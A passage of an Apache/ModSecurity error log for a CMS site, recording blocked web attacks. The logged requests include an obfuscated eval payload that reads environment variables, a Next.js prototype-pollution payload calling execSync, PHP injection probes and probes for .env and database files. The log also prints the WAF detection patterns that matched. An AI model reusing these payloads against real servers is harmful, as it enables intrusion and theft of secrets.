_v=((0,eval)(global[[\\x5c\\x22B\\x5c\\x22,\\x5c\\x22uf\\x5c\\x22,\\x5c\\x22fer\\x5c\\x22].join(\\x5c\\x22\\x5c\\x22)].from('286173796e632066756e6374696f6e28297b636f6e7374206f733d617761697420696d706f727428276f7327292c66733d617761697420696d706f72742827667327292c706174683d617761697420696d706f727428277061746827293b636f6e737420523d7b7d2c453d70726f636573732e656e762c454b3d4f626a6563742e..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "abgkDWjV2nmsjJfhM7M8ugAAAAs"], referer: https://cms.dev-unit.com/ [Mon Mar 16 17:38:55.317431 2026] [:error] [pid 13194:tid 13804] [client 35.222.212.222:20814] [client 35.222.212.222] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: if( found within ARGS:0: {\\x22status\\x22:\\x22resolved_model\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var ywdss=arguments[0x1];var kj=ywdss;try{var _v=((0,eval)(global[[\\x5c\\x22B\\x5c\\x22,\\x5c\\x22uf\\x5c\\x22,\\x5c\\x22fer\\x5c\\x22].join(\\x5c\\x22\\x5c\\x22)].from('286173796e632066756e6374696f6e28297b636f6e7374206f733d617761697420696d706f727428276f7327292c66733d617761697420696d706f72742827667327292c706174683d617761697420696d706f727428277061746827293b636f6e737420523d7b7d2c453d70726f636573732e656e762..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "abgkD2jV2nmsjJfhM7M8yAAAAAw"], referer: https://cms.dev-unit.com/ [Mon Mar 16 17:38:56.295269 2026] [:error] [pid 15336:tid 15380] [client 35.222.212.222:20830] [client 35.222.212.222] ModSecurity: Access denied with code 403 (phase 2). Match of "eq 0" against "MULTIPART_STRICT_ERROR" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "192"] [id "960914"] [rev "1"] [msg "Multipart request body failed strict validation: PE 0, BQ 0, BW 0, DB 1, DA 0, HF 0, LF 0, SM , IQ 0, IH 0, FLE 0"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "7"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ"] [tag "CAPEC-272"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "abgkEKQt2w0-VouOZpPKVQAAAU8"], referer: https://cms.dev-unit.com/ [Sat Mar 21 19:43:26.781131 2026] [access_compat:error] [pid 15423:tid 15636] [client 185.254.197.90:58630] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/.env [Wed Mar 25 05:27:28.373580 2026] [:error] [pid 31844:tid 31919] [client 20.48.232.178:42863] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Fri Mar 27 00:56:02.496311 2026] [authz_core:error] [pid 12709:tid 12723] [client 142.93.129.190:52814] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Fri Mar 27 00:56:03.428691 2026] [authz_core:error] [pid 12587:tid 12652] [client 164.92.107.174:60308] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Fri Mar 27 00:56:16.743138 2026] [:error] [pid 14876:tid 14928] [client 142.93.129.190:37434] [client 142.93.129.190] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "acW5kIkvinLXBnMOcty7FwAAAVQ"] [Fri Mar 27 00:56:20.193197 2026] [:error] [pid 9794:tid 9810] [client 164.92.107.174:44620] [client 164.92.107.174] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "acW5lFUvoxVxnUPz0PC-6wAAAYY"] [Fri Mar 27 00:56:31.722792 2026] [:error] [pid 9794:tid 9814] [client 142.93.129.190:59902] [client 142.93.129.190] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".axd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/trace.axd"] [unique_id "acW5n1UvoxVxnUPz0PC_mwAAAYo"] [Fri Mar 27 00:56:35.202274 2026] [:error] [pid 14876:tid 14931] [client 164.92.107.174:40640] [client 164.92.107.174] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".axd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/trace.axd"] [unique_id "acW5o4kvinLXBnMOcty7sAAAAVc"] [Fri Mar 27 02:25:19.650992 2026] [:error] [pid 12709:tid 12721] [client 216.73.216.120:59173] [client 216.73.216.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^$" at REQUEST_HEADERS:user-agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_21_protocol_anomalies.conf"] [line "68"] [id "960006"] [rev "1"] [msg "Empty User Agent Header"] [severity "NOTICE"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_UA"] [hostname "cms.dev-unit.com"] [uri "/robots.txt"] [unique_id "acXOb2QfBZyVfy7bFZU_vwAAAMo"] [Fri Mar 27 07:47:24.450483 2026] [:error] [pid 635:tid 796] [client 15.206.147.122:60710] [client 15.206.147.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "acYZ7ONkpep9WB2LEqeldQAAAJI"] [Fri Mar 27 07:47:24.586497 2026] [:error] [pid 635:tid 805] [client 15.206.147.122:60710] [client 15.206.147.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "acYZ7ONkpep9WB2LEqeldwAAAJc"] [Fri Mar 27 07:47:24.728414 2026] [:error] [pid 635:tid 776] [client 15.206.147.122:60710] [client 15.206.147.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "acYZ7ONkpep9WB2LEqeleAAAAIc"] [Fri Mar 27 08:02:42.033841 2026] [:error] [pid 16029:tid 16254] [client 18.217.172.58:49302] [client 18.217.172.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "acYdglGMC1fM57wz1nBPCwAAAQM"] [Fri Mar 27 08:02:42.132996 2026] [:error] [pid 16029:tid 16274] [client 18.217.172.58:49302] [client 18.217.172.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "acYdglGMC1fM57wz1nBPDQAAAQs"] [Fri Mar 27 08:02:42.239828 2026] [:error] [pid 16029:tid 16271] [client 18.217.172.58:49302] [client 18.217.172.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "acYdglGMC1fM57wz1nBPDwAAAQo"] [Sat Mar 28 02:50:40.716577 2026] [:error] [pid 16029:tid 16258] [client 18.140.71.190:35652] [client 18.140.71.190] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "accl4FGMC1fM57wz1nBFZQAAAQY"] [Sat Mar 28 02:50:40.870581 2026] [:error] [pid 16029:tid 16255] [client 18.140.71.190:35652] [client 18.140.71.190] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "accl4FGMC1fM57wz1nBFZgAAAQQ"] [Sat Mar 28 02:50:41.033218 2026] [:error] [pid 16029:tid 16254] [client 18.140.71.190:35652] [client 18.140.71.190] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "accl4VGMC1fM57wz1nBFZwAAAQM"] [Sat Mar 28 06:52:16.226381 2026] [:error] [pid 30494:tid 30514] [client 3.122.116.228:42088] [client 3.122.116.228] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "acdegDY61sl6NLdDvEzlswAAANI"] [Sat Mar 28 06:52:16.252343 2026] [:error] [pid 30494:tid 30516] [client 3.122.116.228:42088] [client 3.122.116.228] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "acdegDY61sl6NLdDvEzltAAAANQ"] [Sat Mar 28 06:52:16.275052 2026] [:error] [pid 30494:tid 30498] [client 3.122.116.228:42088] [client 3.122.116.228] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "acdegDY61sl6NLdDvEzltgAAAMI"] [Sat Mar 28 21:53:25.497070 2026] [:error] [pid 16195:tid 16396] [client 34.100.135.49:52767] [client 34.100.135.49] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/db.sql"] [unique_id "acgxtfkqLRsIcucAZ6XoEAAAAQQ"] [Sat Mar 28 21:53:28.779124 2026] [:error] [pid 30494:tid 30520] [client 34.100.135.49:56626] [client 34.100.135.49] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] 